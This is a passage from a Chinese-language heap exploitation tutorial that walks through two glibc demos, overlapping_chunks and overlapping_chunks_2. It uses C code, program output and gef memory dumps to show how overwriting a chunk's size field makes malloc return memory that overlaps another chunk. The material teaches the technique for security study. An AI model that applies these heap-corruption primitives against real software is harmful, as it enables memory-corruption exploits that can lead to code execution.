memset(p3, 'A', 0x80 - 8); fprintf(stderr, "Now we allocate 3 chunks on the heap\n"); fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3); free(p2); fprintf(stderr, "Freeing the chunk p2\n"); int evil_chunk_size = 0x111; int evil_region_size = 0x110 - 8; *(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2 fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n"); p4 = malloc(evil_region_size); fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size); fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80); fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n"); memset(p4, 'B', 0xd0); fprintf(stderr, "p4 = %s\n", (char *)p4); fprintf(stderr, "p3 = %s\n", (char *)p3); fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n"); memset(p3, 'C', 0x50); fprintf(stderr, "p4 = %s\n", (char *)p4); fprintf(stderr, "p3 = %s\n", (char *)p3); } ``` ``` $ gcc -g overlapping_chunks.c $ ./a.out Now we allocate 3 chunks on the heap p1=0x1e2b010 p2=0x1e2b0a0 p3=0x1e2b130 Freeing the chunk p2 Emulating an overflow that can overwrite the size of the chunk p2. p4: 0x1e2b0a0 ~ 0x1e2b8e0 p3: 0x1e2b130 ~ 0x1e2b530 If we memset(p4, 'B', 0xd0), we have: p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa If we memset(p3, 'C', 0x50), we have: p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa ``` 这个比较简单,就是堆块重叠的问题。通过一个溢出漏洞,改写 unsorted bin 中空闲堆块的 size,改变下一次 malloc 可以返回的堆块大小。 首先分配三个堆块,然后释放掉中间的一个: ``` gef➤ x/60gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x4141414141414141 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x0000000000000091 <-- chunk 2 [be freed] 0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x6020b0: 0x4141414141414141 0x4141414141414141 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x4141414141414141 0x602150: 0x4141414141414141 0x4141414141414141 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk 0x6021b0: 0x0000000000000000 0x0000000000000000 0x6021c0: 0x0000000000000000 0x0000000000000000 0x6021d0: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602090, bk=0x602090 → Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE) ``` chunk 2 被放到了 unsorted bin 中,其 size 值为 0x90。 接下来,假设我们有一个溢出漏洞,可以改写 chunk 2 的 size 值,比如这里我们将其改为 0x111,也就是原本 chunk 2 和 chunk 3 的大小相加,最后一位是 1 表示 chunk 1 是在使用的,其实有没有都无所谓。 ``` gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602090, bk=0x602090 → Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE) ``` 这时 unsorted bin 中的数据也更改了。 接下来 malloc 一个大小的等于 chunk 2 和 chunk 3 之和的 chunk 4,这会将 chunk 2 和 chunk 3 都包含进来: ``` gef➤ x/60gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x4141414141414141 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x0000000000000111 <-- chunk 4 0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x6020b0: 0x4141414141414141 0x4141414141414141 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x4141414141414141 0x602150: 0x4141414141414141 0x4141414141414141 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk 0x6021b0: 0x0000000000000000 0x0000000000000000 0x6021c0: 0x0000000000000000 0x0000000000000000 0x6021d0: 0x0000000000000000 0x0000000000000000 ``` 这样,相当于 chunk 4 和 chunk 3 就重叠了,两个 chunk 可以互相修改对方的数据。就像上面的运行结果打印出来的那样。 #### overlapping_chunks_2 ```c #include #include #include #include #include int main() { intptr_t *p1,*p2,*p3,*p4,*p5,*p6; unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6; int prev_in_use = 0x1; p1 = malloc(0x10); p2 = malloc(0x80); p3 = malloc(0x80); p4 = malloc(0x80); p5 = malloc(0x10); real_size_p1 = malloc_usable_size(p1); real_size_p2 = malloc_usable_size(p2); real_size_p3 = malloc_usable_size(p3); real_size_p4 = malloc_usable_size(p4); real_size_p5 = malloc_usable_size(p5); memset(p1, 'A', real_size_p1); memset(p2, 'A', real_size_p2); memset(p3, 'A', real_size_p3); memset(p4, 'A', real_size_p4); memset(p5, 'A', real_size_p5); fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n"); fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1)); fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2)); fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3)); fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4)); fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5)); free(p4); fprintf(stderr, "\nLet's free the chunk p4\n\n"); fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n"); *(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE free(p2); p6 = malloc(0x1b0 - 0x10); real_size_p6 = malloc_usable_size(p6); fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6); fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n"); fprintf(stderr, "p3 before = %s\n", (char *)p3); memset(p6, 'B', 0xd0); fprintf(stderr, "p3 after = %s\n", (char *)p3); } ``` ``` $ gcc -g overlapping_chunks_2.c $ ./a.out Now we allocate 5 chunks on the heap chunk p1: 0x18c2010 ~ 0x18c2028 chunk p2: 0x18c2030 ~ 0x18c20b8 chunk p3: 0x18c20c0 ~ 0x18c2148 chunk p4: 0x18c2150 ~ 0x18c21d8 chunk p5: 0x18c21e0 ~ 0x18c21f8 Let's free the chunk p4 Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3) Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8 Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0) p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� p3 after = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� ``` 同样是堆块重叠的问题,前面那个是在 chunk 已经被 free,加入到了 unsorted bin 之后,再修改其 size 值,然后 malloc 一个不一样的 chunk 出来,而这里是在 free 之前修改 size 值,使 free 错误地修改了下一个 chunk 的 prev_size 值,导致中间的 chunk 强行合并。另外前面那个重叠是相邻堆块之间的,而这里是不相邻堆块之间的。 我们需要五个堆块,假设第 chunk 1 存在溢出,可以改写第二个 chunk 2 的数据,chunk 5 的作用是防止释放 chunk 4 后被合并进 top chunk。所以我们要重叠的区域是 chunk 2 到 chunk 4。首先将 chunk 4 释放掉,注意看 chunk 5 的 prev_size 值: ``` gef➤ x/70gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x0000000000000091 <-- chunk 2 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x4141414141414141 0x6020a0: 0x4141414141414141 0x4141414141414141 0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x4141414141414141 0x4141414141414141 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed] 0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x4141414141414141 0x6021b0: 0x4141414141414141 0x4141414141414141 0x6021c0: 0x4141414141414141 0x4141414141414141 0x6021d0: 0x0000000000000090 0x0000000000000020 <-- chunk 5 <-- prev_size 0x6021e0: 0x4141414141414141 0x4141414141414141 0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk 0x602200: 0x0000000000000000 0x0000000000000000 0x602210: 0x0000000000000000 0x0000000000000000 0x602220: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602140, bk=0x602140 → Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE) ``` free chunk 4 被放入 unsorted bin,大小为 0x90。 接下来是最关键的一步,利用 chunk 1 的溢出漏洞,将 chunk 2 的 size 值修改为 chunk 2 和 chunk 3 的大小之和,即 0x90+0x90+0x1=0x121,最后的 1 是标志位。这样当我们释放 chunk 2 的时候,malloc 根据这个被修改的 size 值,会以为 chunk 2 加上 chunk 3 的区域都是要释放的,然后就错误地修改了 chunk 5 的 prev_size。接着,它发现紧邻的一块 chunk 4 也是 free 状态,就把它俩合并在了一起,组成一个大 free chunk,放进 unsorted bin 中。 ``` gef➤ x/70gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x00000000000001b1 <-- chunk 2 [be freed] <-- unsorted bin 0x602030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x4141414141414141 0x6020a0: 0x4141414141414141 0x4141414141414141 0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x4141414141414141 0x4141414141414141 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed] 0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x4141414141414141 0x6021b0: 0x4141414141414141 0x4141414141414141 0x6021c0: 0x4141414141414141 0x4141414141414141 0x6021d0: 0x00000000000001b0 0x0000000000000020 <-- chunk 5 <-- prev_size 0x6021e0: 0x4141414141414141 0x4141414141414141 0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk 0x602200: 0x0000000000000000 0x0000000000000000 0x602210: 0x0000000000000000 0x0000000000000000 0x602220: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602020, bk=0x602020 → Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE) ``` 现在 unsorted bin 里的 chunk 的大小为 0x1b0,即 0x90*3。咦,所以 chunk 3 虽然是使用状态,但也被强行算在了 free chunk 的空间里了。 最后,如果我们分配一块大小为 0x1b0-0x10 的大空间,返回的堆块即是包括了 chunk 2 + chunk 3 + chunk 4 的大 chunk。这时 chunk 6 和 chunk 3 就重叠了,结果就像上面运行时打印出来的一样。